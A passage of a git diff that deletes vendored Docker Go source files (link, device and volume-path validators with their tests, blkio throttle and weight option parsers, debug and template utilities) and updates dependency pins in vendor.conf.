-	invalid := map[string]string{
-		"":               "empty string specified for links",
-		"too:much:of:it": "bad format for links: too:much:of:it",
-	}
-
-	for _, link := range valid {
-		if _, err := ValidateLink(link); err != nil {
-			t.Fatalf("ValidateLink(`%q`) should succeed: error %q", link, err)
-		}
-	}
-
-	for link, expectedError := range invalid {
-		if _, err := ValidateLink(link); err == nil {
-			t.Fatalf("ValidateLink(`%q`) should have failed validation", link)
-		} else {
-			if !strings.Contains(err.Error(), expectedError) {
-				t.Fatalf("ValidateLink(`%q`) error should contain %q", link, expectedError)
-			}
-		}
-	}
-}
-
-func TestParseLink(t *testing.T) {
-	name, alias, err := ParseLink("name:alias")
-	if err != nil {
-		t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err)
-	}
-	if name != "name" {
-		t.Fatalf("Link name should have been name, got %s instead", name)
-	}
-	if alias != "alias" {
-		t.Fatalf("Link alias should have been alias, got %s instead", alias)
-	}
-	// short format definition
-	name, alias, err = ParseLink("name")
-	if err != nil {
-		t.Fatalf("Expected not to error out on a valid name only format but got: %v", err)
-	}
-	if name != "name" {
-		t.Fatalf("Link name should have been name, got %s instead", name)
-	}
-	if alias != "name" {
-		t.Fatalf("Link alias should have been name, got %s instead", alias)
-	}
-	// empty string link definition is not allowed
-	if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") {
-		t.Fatalf("Expected error 'empty string specified for links' but got: %v", err)
-	}
-	// more than two colons are not allowed
-	if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") {
-		t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err)
-	}
-}
-
-func TestValidateDevice(t *testing.T) {
-	valid := []string{
-		"/home",
-		"/home:/home",
-		"/home:/something/else",
-		"/with space",
-		"/home:/with space",
-		"relative:/absolute-path",
-		"hostPath:/containerPath:r",
-		"/hostPath:/containerPath:rw",
-		"/hostPath:/containerPath:mrw",
-	}
-	invalid := map[string]string{
-		"":        "bad format for path: ",
-		"./":      "./ is not an absolute path",
-		"../":     "../ is not an absolute path",
-		"/:../":   "../ is not an absolute path",
-		"/:path":  "path is not an absolute path",
-		":":       "bad format for path: :",
-		"/tmp:":   " is not an absolute path",
-		":test":   "bad format for path: :test",
-		":/test":  "bad format for path: :/test",
-		"tmp:":    " is not an absolute path",
-		":test:":  "bad format for path: :test:",
-		"::":      "bad format for path: ::",
-		":::":     "bad format for path: :::",
-		"/tmp:::": "bad format for path: /tmp:::",
-		":/tmp::": "bad format for path: :/tmp::",
-		"path:ro": "ro is not an absolute path",
-		"path:rr": "rr is not an absolute path",
-		"a:/b:ro": "bad mode specified: ro",
-		"a:/b:rr": "bad mode specified: rr",
-	}
-
-	for _, path := range valid {
-		if _, err := ValidateDevice(path); err != nil {
-			t.Fatalf("ValidateDevice(`%q`) should succeed: error %q", path, err)
-		}
-	}
-
-	for path, expectedError := range invalid {
-		if _, err := ValidateDevice(path); err == nil {
-			t.Fatalf("ValidateDevice(`%q`) should have failed validation", path)
-		} else {
-			if err.Error() != expectedError {
-				t.Fatalf("ValidateDevice(`%q`) error should contain %q, got %q", path, expectedError, err.Error())
-			}
-		}
-	}
-}
-
-func TestVolumeSplitN(t *testing.T) {
-	for _, x := range []struct {
-		input    string
-		n        int
-		expected []string
-	}{
-		{`C:\foo:d:`, -1, []string{`C:\foo`, `d:`}},
-		{`:C:\foo:d:`, -1, nil},
-		{`/foo:/bar:ro`, 3, []string{`/foo`, `/bar`, `ro`}},
-		{`/foo:/bar:ro`, 2, []string{`/foo`, `/bar:ro`}},
-		{`C:\foo\:/foo`, -1, []string{`C:\foo\`, `/foo`}},
-
-		{`d:\`, -1, []string{`d:\`}},
-		{`d:`, -1, []string{`d:`}},
-		{`d:\path`, -1, []string{`d:\path`}},
-		{`d:\path with space`, -1, []string{`d:\path with space`}},
-		{`d:\pathandmode:rw`, -1, []string{`d:\pathandmode`, `rw`}},
-		{`c:\:d:\`, -1, []string{`c:\`, `d:\`}},
-		{`c:\windows\:d:`, -1, []string{`c:\windows\`, `d:`}},
-		{`c:\windows:d:\s p a c e`, -1, []string{`c:\windows`, `d:\s p a c e`}},
-		{`c:\windows:d:\s p a c e:RW`, -1, []string{`c:\windows`, `d:\s p a c e`, `RW`}},
-		{`c:\program files:d:\s p a c e i n h o s t d i r`, -1, []string{`c:\program files`, `d:\s p a c e i n h o s t d i r`}},
-		{`0123456789name:d:`, -1, []string{`0123456789name`, `d:`}},
-		{`MiXeDcAsEnAmE:d:`, -1, []string{`MiXeDcAsEnAmE`, `d:`}},
-		{`name:D:`, -1, []string{`name`, `D:`}},
-		{`name:D::rW`, -1, []string{`name`, `D:`, `rW`}},
-		{`name:D::RW`, -1, []string{`name`, `D:`, `RW`}},
-		{`c:/:d:/forward/slashes/are/good/too`, -1, []string{`c:/`, `d:/forward/slashes/are/good/too`}},
-		{`c:\Windows`, -1, []string{`c:\Windows`}},
-		{`c:\Program Files (x86)`, -1, []string{`c:\Program Files (x86)`}},
-
-		{``, -1, nil},
-		{`.`, -1, []string{`.`}},
-		{`..\`, -1, []string{`..\`}},
-		{`c:\:..\`, -1, []string{`c:\`, `..\`}},
-		{`c:\:d:\:xyzzy`, -1, []string{`c:\`, `d:\`, `xyzzy`}},
-
-		// Cover directories with one-character name
-		{`/tmp/x/y:/foo/x/y`, -1, []string{`/tmp/x/y`, `/foo/x/y`}},
-	} {
-		res := volumeSplitN(x.input, x.n)
-		if len(res) < len(x.expected) {
-			t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res)
-		}
-		for i, e := range res {
-			if e != x.expected[i] {
-				t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res)
-			}
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go
deleted file mode 100644
index 5024324298..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go
+++ /dev/null
@@ -1,111 +0,0 @@
-package opts
-
-import (
-	"fmt"
-	"strconv"
-	"strings"
-
-	"github.com/docker/docker/api/types/blkiodev"
-	"github.com/docker/go-units"
-)
-
-// ValidatorThrottleFctType defines a validator function that returns a validated struct and/or an error.
-type ValidatorThrottleFctType func(val string) (*blkiodev.ThrottleDevice, error)
-
-// ValidateThrottleBpsDevice validates that the specified string has a valid device-rate format.
-func ValidateThrottleBpsDevice(val string) (*blkiodev.ThrottleDevice, error) {
-	split := strings.SplitN(val, ":", 2)
-	if len(split) != 2 {
-		return nil, fmt.Errorf("bad format: %s", val)
-	}
-	if !strings.HasPrefix(split[0], "/dev/") {
-		return nil, fmt.Errorf("bad format for device path: %s", val)
-	}
-	rate, err := units.RAMInBytes(split[1])
-	if err != nil {
-		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>[<unit>]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val)
-	}
-	if rate < 0 {
-		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>[<unit>]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val)
-	}
-
-	return &blkiodev.ThrottleDevice{
-		Path: split[0],
-		Rate: uint64(rate),
-	}, nil
-}
-
-// ValidateThrottleIOpsDevice validates that the specified string has a valid device-rate format.
-func ValidateThrottleIOpsDevice(val string) (*blkiodev.ThrottleDevice, error) {
-	split := strings.SplitN(val, ":", 2)
-	if len(split) != 2 {
-		return nil, fmt.Errorf("bad format: %s", val)
-	}
-	if !strings.HasPrefix(split[0], "/dev/") {
-		return nil, fmt.Errorf("bad format for device path: %s", val)
-	}
-	rate, err := strconv.ParseUint(split[1], 10, 64)
-	if err != nil {
-		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>. Number must be a positive integer", val)
-	}
-	if rate < 0 {
-		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>. Number must be a positive integer", val)
-	}
-
-	return &blkiodev.ThrottleDevice{
-		Path: split[0],
-		Rate: uint64(rate),
-	}, nil
-}
-
-// ThrottledeviceOpt defines a map of ThrottleDevices
-type ThrottledeviceOpt struct {
-	values    []*blkiodev.ThrottleDevice
-	validator ValidatorThrottleFctType
-}
-
-// NewThrottledeviceOpt creates a new ThrottledeviceOpt
-func NewThrottledeviceOpt(validator ValidatorThrottleFctType) ThrottledeviceOpt {
-	values := []*blkiodev.ThrottleDevice{}
-	return ThrottledeviceOpt{
-		values:    values,
-		validator: validator,
-	}
-}
-
-// Set validates a ThrottleDevice and sets its name as a key in ThrottledeviceOpt
-func (opt *ThrottledeviceOpt) Set(val string) error {
-	var value *blkiodev.ThrottleDevice
-	if opt.validator != nil {
-		v, err := opt.validator(val)
-		if err != nil {
-			return err
-		}
-		value = v
-	}
-	(opt.values) = append((opt.values), value)
-	return nil
-}
-
-// String returns ThrottledeviceOpt values as a string.
-func (opt *ThrottledeviceOpt) String() string {
-	var out []string
-	for _, v := range opt.values {
-		out = append(out, v.String())
-	}
-
-	return fmt.Sprintf("%v", out)
-}
-
-// GetList returns a slice of pointers to ThrottleDevices.
-func (opt *ThrottledeviceOpt) GetList() []*blkiodev.ThrottleDevice {
-	var throttledevice []*blkiodev.ThrottleDevice
-	throttledevice = append(throttledevice, opt.values...)
-
-	return throttledevice
-}
-
-// Type returns the option type
-func (opt *ThrottledeviceOpt) Type() string {
-	return "throttled-device"
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go
deleted file mode 100644
index 2a5da6da08..0000000000
--- a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go
+++ /dev/null
@@ -1,89 +0,0 @@
-package opts
-
-import (
-	"fmt"
-	"strconv"
-	"strings"
-
-	"github.com/docker/docker/api/types/blkiodev"
-)
-
-// ValidatorWeightFctType defines a validator function that returns a validated struct and/or an error.
-type ValidatorWeightFctType func(val string) (*blkiodev.WeightDevice, error)
-
-// ValidateWeightDevice validates that the specified string has a valid device-weight format.
-func ValidateWeightDevice(val string) (*blkiodev.WeightDevice, error) {
-	split := strings.SplitN(val, ":", 2)
-	if len(split) != 2 {
-		return nil, fmt.Errorf("bad format: %s", val)
-	}
-	if !strings.HasPrefix(split[0], "/dev/") {
-		return nil, fmt.Errorf("bad format for device path: %s", val)
-	}
-	weight, err := strconv.ParseUint(split[1], 10, 0)
-	if err != nil {
-		return nil, fmt.Errorf("invalid weight for device: %s", val)
-	}
-	if weight > 0 && (weight < 10 || weight > 1000) {
-		return nil, fmt.Errorf("invalid weight for device: %s", val)
-	}
-
-	return &blkiodev.WeightDevice{
-		Path:   split[0],
-		Weight: uint16(weight),
-	}, nil
-}
-
-// WeightdeviceOpt defines a map of WeightDevices
-type WeightdeviceOpt struct {
-	values    []*blkiodev.WeightDevice
-	validator ValidatorWeightFctType
-}
-
-// NewWeightdeviceOpt creates a new WeightdeviceOpt
-func NewWeightdeviceOpt(validator ValidatorWeightFctType) WeightdeviceOpt {
-	values := []*blkiodev.WeightDevice{}
-	return WeightdeviceOpt{
-		values:    values,
-		validator: validator,
-	}
-}
-
-// Set validates a WeightDevice and sets its name as a key in WeightdeviceOpt
-func (opt *WeightdeviceOpt) Set(val string) error {
-	var value *blkiodev.WeightDevice
-	if opt.validator != nil {
-		v, err := opt.validator(val)
-		if err != nil {
-			return err
-		}
-		value = v
-	}
-	(opt.values) = append((opt.values), value)
-	return nil
-}
-
-// String returns WeightdeviceOpt values as a string.
-func (opt *WeightdeviceOpt) String() string {
-	var out []string
-	for _, v := range opt.values {
-		out = append(out, v.String())
-	}
-
-	return fmt.Sprintf("%v", out)
-}
-
-// GetList returns a slice of pointers to WeightDevices.
-func (opt *WeightdeviceOpt) GetList() []*blkiodev.WeightDevice {
-	var weightdevice []*blkiodev.WeightDevice
-	for _, v := range opt.values {
-		weightdevice = append(weightdevice, v)
-	}
-
-	return weightdevice
-}
-
-// Type returns the option type
-func (opt *WeightdeviceOpt) Type() string {
-	return "weighted-device"
-}
diff --git a/vendor/github.com/docker/docker/utils/debug.go b/vendor/github.com/docker/docker/utils/debug.go
deleted file mode 100644
index d203891129..0000000000
--- a/vendor/github.com/docker/docker/utils/debug.go
+++ /dev/null
@@ -1,26 +0,0 @@
-package utils
-
-import (
-	"os"
-
-	"github.com/Sirupsen/logrus"
-)
-
-// EnableDebug sets the DEBUG env var to true
-// and makes the logger to log at debug level.
-func EnableDebug() {
-	os.Setenv("DEBUG", "1")
-	logrus.SetLevel(logrus.DebugLevel)
-}
-
-// DisableDebug sets the DEBUG env var to false
-// and makes the logger to log at info level.
-func DisableDebug() {
-	os.Setenv("DEBUG", "")
-	logrus.SetLevel(logrus.InfoLevel)
-}
-
-// IsDebugEnabled checks whether the debug flag is set or not.
-func IsDebugEnabled() bool {
-	return os.Getenv("DEBUG") != ""
-}
diff --git a/vendor/github.com/docker/docker/utils/process_windows.go b/vendor/github.com/docker/docker/utils/process_windows.go
deleted file mode 100644
index 03cb855197..0000000000
--- a/vendor/github.com/docker/docker/utils/process_windows.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package utils
-
-// IsProcessAlive returns true if process with a given pid is running.
-func IsProcessAlive(pid int) bool {
-	// TODO Windows containerd. Not sure this is needed
-	//	p, err := os.FindProcess(pid)
-	//	if err == nil {
-	//		return true
-	//	}
-	return false
-}
-
-// KillProcess force-stops a process.
-func KillProcess(pid int) {
-	// TODO Windows containerd. Not sure this is needed
-	//	p, err := os.FindProcess(pid)
-	//	if err == nil {
-	//		p.Kill()
-	//	}
-}
diff --git a/vendor/github.com/docker/docker/utils/templates/templates.go b/vendor/github.com/docker/docker/utils/templates/templates.go
deleted file mode 100644
index 91c376f38f..0000000000
--- a/vendor/github.com/docker/docker/utils/templates/templates.go
+++ /dev/null
@@ -1,42 +0,0 @@
-package templates
-
-import (
-	"encoding/json"
-	"strings"
-	"text/template"
-)
-
-// basicFunctions are the set of initial
-// functions provided to every template.
-var basicFunctions = template.FuncMap{
-	"json": func(v interface{}) string {
-		a, _ := json.Marshal(v)
-		return string(a)
-	},
-	"split": strings.Split,
-	"join":  strings.Join,
-	"title": strings.Title,
-	"lower": strings.ToLower,
-	"upper": strings.ToUpper,
-	"pad":   padWithSpace,
-}
-
-// Parse creates a new annonymous template with the basic functions
-// and parses the given format.
-func Parse(format string) (*template.Template, error) {
-	return NewParse("", format)
-}
-
-// NewParse creates a new tagged template with the basic functions
-// and parses the given format.
-func NewParse(tag, format string) (*template.Template, error) {
-	return template.New(tag).Funcs(basicFunctions).Parse(format)
-}
-
-// padWithSpace adds whitespace to the input if the input is non-empty
-func padWithSpace(source string, prefix, suffix int) string {
-	if source == "" {
-		return source
-	}
-	return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix)
-}
diff --git a/vendor/github.com/docker/docker/utils/templates/templates_test.go b/vendor/github.com/docker/docker/utils/templates/templates_test.go
deleted file mode 100644
index dd42901aed..0000000000
--- a/vendor/github.com/docker/docker/utils/templates/templates_test.go
+++ /dev/null
@@ -1,38 +0,0 @@
-package templates
-
-import (
-	"bytes"
-	"testing"
-)
-
-func TestParseStringFunctions(t *testing.T) {
-	tm, err := Parse(`{{join (split . ":") "/"}}`)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	var b bytes.Buffer
-	if err := tm.Execute(&b, "text:with:colon"); err != nil {
-		t.Fatal(err)
-	}
-	want := "text/with/colon"
-	if b.String() != want {
-		t.Fatalf("expected %s, got %s", want, b.String())
-	}
-}
-
-func TestNewParse(t *testing.T) {
-	tm, err := NewParse("foo", "this is a {{ . }}")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	var b bytes.Buffer
-	if err := tm.Execute(&b, "string"); err != nil {
-		t.Fatal(err)
-	}
-	want := "this is a string"
-	if b.String() != want {
-		t.Fatalf("expected %s, got %s", want, b.String())
-	}
-}
diff --git a/vendor/github.com/docker/docker/utils/utils.go b/vendor/github.com/docker/docker/utils/utils.go
deleted file mode 100644
index d3dd00abf4..0000000000
--- a/vendor/github.com/docker/docker/utils/utils.go
+++ /dev/null
@@ -1,87 +0,0 @@
-package utils
-
-import (
-	"fmt"
-	"io/ioutil"
-	"os"
-	"runtime"
-	"strings"
-
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/stringid"
-)
-
-var globalTestID string
-
-// TestDirectory creates a new temporary directory and returns its path.
-// The contents of directory at path `templateDir` is copied into the
-// new directory.
-func TestDirectory(templateDir string) (dir string, err error) {
-	if globalTestID == "" {
-		globalTestID = stringid.GenerateNonCryptoID()[:4]
-	}
-	prefix := fmt.Sprintf("docker-test%s-%s-", globalTestID, GetCallerName(2))
-	if prefix == "" {
-		prefix = "docker-test-"
-	}
-	dir, err = ioutil.TempDir("", prefix)
-	if err = os.Remove(dir); err != nil {
-		return
-	}
-	if templateDir != "" {
-		if err = archive.CopyWithTar(templateDir, dir); err != nil {
-			return
-		}
-	}
-	return
-}
-
-// GetCallerName introspects the call stack and returns the name of the
-// function `depth` levels down in the stack.
-func GetCallerName(depth int) string {
-	// Use the caller function name as a prefix.
-	// This helps trace temp directories back to their test.
-	pc, _, _, _ := runtime.Caller(depth + 1)
-	callerLongName := runtime.FuncForPC(pc).Name()
-	parts := strings.Split(callerLongName, ".")
-	callerShortName := parts[len(parts)-1]
-	return callerShortName
-}
-
-// ReplaceOrAppendEnvValues returns the defaults with the overrides either
-// replaced by env key or appended to the list
-func ReplaceOrAppendEnvValues(defaults, overrides []string) []string {
-	cache := make(map[string]int, len(defaults))
-	for i, e := range defaults {
-		parts := strings.SplitN(e, "=", 2)
-		cache[parts[0]] = i
-	}
-
-	for _, value := range overrides {
-		// Values w/o = means they want this env to be removed/unset.
-		if !strings.Contains(value, "=") {
-			if i, exists := cache[value]; exists {
-				defaults[i] = "" // Used to indicate it should be removed
-			}
-			continue
-		}
-
-		// Just do a normal set/update
-		parts := strings.SplitN(value, "=", 2)
-		if i, exists := cache[parts[0]]; exists {
-			defaults[i] = value
-		} else {
-			defaults = append(defaults, value)
-		}
-	}
-
-	// Now remove all entries that we want to "unset"
-	for i := 0; i < len(defaults); i++ {
-		if defaults[i] == "" {
-			defaults = append(defaults[:i], defaults[i+1:]...)
-			i--
-		}
-	}
-
-	return defaults
-}
diff --git a/vendor/github.com/docker/docker/vendor.conf b/vendor/github.com/docker/docker/vendor.conf
index bb7718bc42..25f74900d0 100644
--- a/vendor/github.com/docker/docker/vendor.conf
+++ b/vendor/github.com/docker/docker/vendor.conf
@@ -1,116 +1,139 @@
 # the following lines are in sorted order, FYI
-github.com/Azure/go-ansiterm 388960b655244e76e24c75f48631564eaefade62
-github.com/Microsoft/hcsshim v0.5.9
-github.com/Microsoft/go-winio v0.3.8
-github.com/Sirupsen/logrus v0.11.0
-github.com/davecgh/go-spew 6d212800a42e8ab5c146b8ace3490ee17e5225f9
+github.com/Azure/go-ansiterm d6e3b3328b783f23731bc4d058875b0371ff8109
+github.com/Microsoft/hcsshim v0.6.11
+github.com/Microsoft/go-winio v0.4.7
 github.com/docker/libtrust 9cbd2a1374f46905c68a4eb3694a130610adc62a
 github.com/go-check/check 4ed411733c5785b40214c70bce814c3a3a689609 https://github.com/cpuguy83/check.git
+github.com/golang/gddo 9b12a26f3fbd7397dee4e20939ddca719d840d2a
 github.com/gorilla/context v1.1
 github.com/gorilla/mux v1.1
+github.com/Microsoft/opengcs v0.3.6
 github.com/kr/pty 5cf931ef8f
-github.com/mattn/go-shellwords v1.0.0
-github.com/mattn/go-sqlite3 v1.1.0
+github.com/mattn/go-shellwords v1.0.3
+github.com/sirupsen/logrus v1.0.3
 github.com/tchap/go-patricia v2.2.6
 github.com/vdemeester/shakers 24d7f1d6a71aa5d9cbe7390e4afb66b7eef9e1b3
-# forked golang.org/x/net package includes a patch for lazy loading trace templates
-golang.org/x/net 2beffdc2e92c8a3027590f898fe88f69af48a3f8 https://github.com/tonistiigi/net.git
-golang.org/x/sys 8f0908ab3b2457e2e15403d3697c9ef5cb4b57a9
-github.com/docker/go-units 8a7beacffa3009a9ac66bad506b18ffdd110cf97
-github.com/docker/go-connections ecb4cb2dd420ada7df7f2593d6c25441f65f69f2
+golang.org/x/net 0ed95abb35c445290478a5348a7b38bb154135fd
+golang.org/x/sys 37707fdb30a5b38865cfb95e5aab41707daec7fd
+github.com/docker/go-units 9e638d38cf6977a37a8ea0078f3ee75a7cdb2dd1
+github.com/docker/go-connections 7beb39f0b969b075d1325fecb092faf27fd357b6
+golang.org/x/text f72d8390a633d5dfb0cc84043294db9f6c935756
+gotest.tools v2.1.0
+github.com/google/go-cmp v0.2.0
 
 github.com/RackSec/srslog 456df3a81436d29ba874f3590eeeee25d666f8a5
-github.com/imdario/mergo 0.2.1
+github.com/imdario/mergo v0.3.5
+golang.org/x/sync fd80eb99c8f653c847d294a001bdf2a3a6f768f5
+
+# buildkit
+github.com/moby/buildkit dbf67a691ce77023a0a5ce9b005298631f8bbb4e
+github.com/tonistiigi/fsutil 8abad97ee3969cdf5e9c367f46adba2c212b3ddb
+github.com/grpc-ecosystem/grpc-opentracing 8e809c8a86450a29b90dcc9efbf062d0fe6d9746
+github.com/opentracing/opentracing-go 1361b9cd60be79c4c3a7fa9841b3c132e40066a7
+github.com/google/shlex 6f45313302b9c56850fc17f99e40caebce98c716
+github.com/opentracing-contrib/go-stdlib  b1a47cfbdd7543e70e9ef3e73d0802ad306cc1cc
+github.com/mitchellh/hashstructure 2bca23e0e452137f789efbc8610126fd8b94f73b
 
 #get libnetwork packages
-github.com/docker/libnetwork 45b40861e677e37cf27bc184eca5af92f8cdd32d
-github.com/docker/go-events 18b43f1bc85d9cdd42c05a6cd2d444c7a200a894
+
+# When updating, also update LIBNETWORK_COMMIT in hack/dockerfile/install/proxy accordingly
+github.com/docker/libnetwork 19279f0492417475b6bfbd0aa529f73e8f178fb5
+github.com/docker/go-events 9461782956ad83b30282bf90e31fa6a70c255ba9
 github.com/armon/go-radix e39d623f12e8e41c7b5529e9a9dd67a1e2261f80
 github.com/armon/go-metrics eb0af217e5e9747e41dd5303755356b62d28e3ec
 github.com/hashicorp/go-msgpack 71c2886f5a673a35f909803f38ece5810165097b
-github.com/hashicorp/memberlist 88ac4de0d1a0ca6def284b571342db3b777a4c37
+github.com/hashicorp/memberlist 3d8438da9589e7b608a83ffac1ef8211486bcb7c
+github.com/sean-/seed e2103e2c35297fb7e17febb81e49b312087a2372
+github.com/hashicorp/go-sockaddr acd314c5781ea706c710d9ea70069fd2e110d61d
 github.com/hashicorp/go-multierror fcdddc395df1ddf4247c69bd436e84cfa0733f7e
 github.com/hashicorp/serf 598c54895cc5a7b1a24a398d635e8c0ea0959870
 github.com/docker/libkv 1d8431073ae03cdaedb198a89722f3aab6d418ef
 github.com/vishvananda/netns 604eaf189ee867d8c147fafc28def2394e878d25
-github.com/vishvananda/netlink 482f7a52b758233521878cb6c5904b6bd63f3457
-github.com/BurntSushi/toml f706d00e3de6abe700c994cdd545a1a4915af060
+github.com/vishvananda/netlink b2de5d10e38ecce8607e6b438b6d174f389a004e
+
+# When updating, consider updating TOMLV_COMMIT in hack/dockerfile/install/tomlv accordingly
+github.com/BurntSushi/toml a368813c5e648fee92e5f6c30e3944ff9d5e8895
 github.com/samuel/go-zookeeper d0e0d8e11f318e000a8cc434616d69e329edc374
 github.com/deckarep/golang-set ef32fa3046d9f249d399f98ebaf9be944430fd1d
-github.com/coreos/etcd 3a49cbb769ebd8d1dd25abb1e83386e9883a5707
+github.com/coreos/etcd v3.2.1
+github.com/coreos/go-semver v0.2.0
 github.com/ugorji/go f1f1a805ed361a0e078bb537e4ea78cd37dcf065
 github.com/hashicorp/consul v0.5.2
 github.com/boltdb/bolt fff57c100f4dea1905678da7e90d92429dff2904
-github.com/miekg/dns 75e6e86cc601825c5dbcd4e0c209eab180997cd7
+github.com/miekg/dns v1.0.7
+github.com/ishidawataru/sctp 07191f837fedd2f13d1ec7b5f885f0f3ec54b1cb
 
 # get graph and distribution packages
-github.com/docker/distribution 28602af35aceda2f8d571bad7ca37a54cf0250bc
-github.com/vbatts/tar-split v0.10.1
+github.com/docker/distribution 83389a148052d74ac602f5f1d62f86ff2f3c4aa5
+github.com/vbatts/tar-split v0.10.2
+github.com/opencontainers/go-digest v1.0.0-rc1
 
 # get go-zfs packages
 github.com/mistifyio/go-zfs 22c9b32c84eb0d0c6f4043b6e90fc94073de92fa
 github.com/pborman/uuid v1.0
 
-# get desired notary commit, might also need to be updated in Dockerfile
-github.com/docker/notary v0.4.2
+google.golang.org/grpc v1.12.0
 
-google.golang.org/grpc v1.0.2
-github.com/miekg/pkcs11 df8ae6ca730422dba20c768ff38ef7d79077a59f
-github.com/docker/go v1.5.1-1-1-gbaf439e
-github.com/agl/ed25519 d2b94fd789ea21d12fac1a4443dd3a3f79cda72c
-
-# When updating, also update RUNC_COMMIT in hack/dockerfile/binaries-commits accordingly
-github.com/opencontainers/runc 9df8b306d01f59d3a8029be411de015b7304dd8f https://github.com/docker/runc.git # libcontainer
-github.com/opencontainers/runtime-spec 1c7c27d043c2a5e513a44084d2b10d77d1402b8c # specs
+# This does not need to match RUNC_COMMIT as it is used for helper packages but should be newer or equal
+github.com/opencontainers/runc ad0f5255060d36872be04de22f8731f38ef2d7b1
+github.com/opencontainers/runtime-spec v1.0.1
+github.com/opencontainers/image-spec v1.0.1
 github.com/seccomp/libseccomp-golang 32f571b70023028bd57d9288c20efbcb237f3ce0
+
 # libcontainer deps (see src/github.com/opencontainers/runc/Godeps/Godeps.json)
-github.com/coreos/go-systemd v4
+github.com/coreos/go-systemd v17
 github.com/godbus/dbus v4.0.0
 github.com/syndtr/gocapability 2c00daeb6c3b45114c80ac44119e7b8801fdd852
-github.com/golang/protobuf 1f49d83d9aa00e6ce4fc8258c71cc7786aec968a
+github.com/golang/protobuf v1.1.0
 
 # gelf logging driver deps
-github.com/Graylog2/go-gelf aab2f594e4585d43468ac57287b0dece9d806883
+github.com/Graylog2/go-gelf 4143646226541087117ff2f83334ea48b3201841
 
-github.com/fluent/fluent-logger-golang v1.2.1
+github.com/fluent/fluent-logger-golang v1.3.0
 # fluent-logger-golang deps
-github.com/philhofer/fwd 899e4efba8eaa1fea74175308f3fae18ff3319fa
-github.com/tinylib/msgp 75ee40d2601edf122ef667e2a07d600d4c44490c
+github.com/philhofer/fwd 98c11a7a6ec829d672b03833c3d69a7fae1ca972
+github.com/tinylib/msgp 3b556c64540842d4f82967be066a7f7fffc3adad
 
 # fsnotify
-github.com/fsnotify/fsnotify v1.2.11
+github.com/fsnotify/fsnotify 4da3e2cfbabc9f751898f250b49f2439785783a1
 
 # awslogs deps
-github.com/aws/aws-sdk-go v1.4.22
-github.com/go-ini/ini 060d7da055ba6ec5ea7a31f116332fe5efa04ce0
+github.com/aws/aws-sdk-go v1.12.66
+github.com/go-ini/ini v1.25.4
 github.com/jmespath/go-jmespath 0b12d6b521d83fc7f755e7cfc1b1fbdd35a01a74
 
 # logentries
-github.com/bsphere/le_go d3308aafe090956bc89a65f0769f58251a1b4f03
+github.com/bsphere/le_go 7a984a84b5492ae539b79b62fb4a10afc63c7bcf
 
 # gcplogs deps
-golang.org/x/oauth2 2baa8a1b9338cf13d9eeb27696d761155fa480be
-google.golang.org/api dc6d2353af16e2a2b0ff6986af051d473a4ed468
-google.golang.org/cloud dae7e3d993bc3812a2185af60552bb6b847e52a0
-
-# native credentials
-github.com/docker/docker-credential-helpers f72c04f1d8e71959a6d103f808c50ccbad79b9fd
+golang.org/x/oauth2 ec22f46f877b4505e0117eeaab541714644fdd28
+google.golang.org/api de943baf05a022a8f921b544b7827bacaba1aed5
+go.opencensus.io v0.11.0
+cloud.google.com/go v0.23.0
+github.com/googleapis/gax-go v2.0.0
+google.golang.org/genproto 694d95ba50e67b2e363f3483057db5d4910c18f9
 
 # containerd
-github.com/docker/containerd aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1
-github.com/tonistiigi/fifo 1405643975692217d6720f8b54aeee1bf2cd5cf4
+github.com/containerd/containerd 63522d9eaa5a0443d225642c4b6f4f5fdedf932b
+github.com/containerd/fifo 3d5202aec260678c48179c56f40e6f38a095738c
+github.com/containerd/continuity d3c23511c1bf5851696cba83143d9cbcd666869b
+github.com/containerd/cgroups fe281dd265766145e943a034aa41086474ea6130
+github.com/containerd/console 9290d21dc56074581f619579c43d970b4514bc08
+github.com/containerd/go-runc f271fa2021de855d4d918dbef83c5fe19db1bdd
+github.com/containerd/typeurl f6943554a7e7e88b3c14aad190bf05932da84788
+github.com/stevvooe/ttrpc d4528379866b0ce7e9d71f3eb96f0582fc374577
+github.com/gogo/googleapis 08a7655d27152912db7aaf4f983275eaf8d128ef
 
 # cluster
-github.com/docker/swarmkit 1c7f003d75f091d5f7051ed982594420e4515f77
-github.com/golang/mock bd3c8e81be01eef76d4b503f5e687d2d1354d2d9
-github.com/gogo/protobuf v0.3
+github.com/docker/swarmkit edd5641391926a50bc5f7040e20b7efc05003c26
+github.com/gogo/protobuf v1.0.0
 github.com/cloudflare/cfssl 7fb22c8cba7ecaf98e4082d22d65800cf45e042a
+github.com/fernet/fernet-go 1b2437bc582b3cfbb341ee5a29f8ef5b42912ff2
 github.com/google/certificate-transparency d90e65c3a07988180c5b1ece71791c0b6506826e
-golang.org/x/crypto 3fbbcd23f1cb824e69491a5930cfeff09b12f4d2
+golang.org/x/crypto 1a580b3eff7814fc9b40602fd35256c63b50f491
 golang.org/x/time a4bde12657593d5e90d0533a3e4fd95e635124cb
-github.com/mreiferson/go-httpclient 63fe23f7434723dc904c901043af07931f293c47
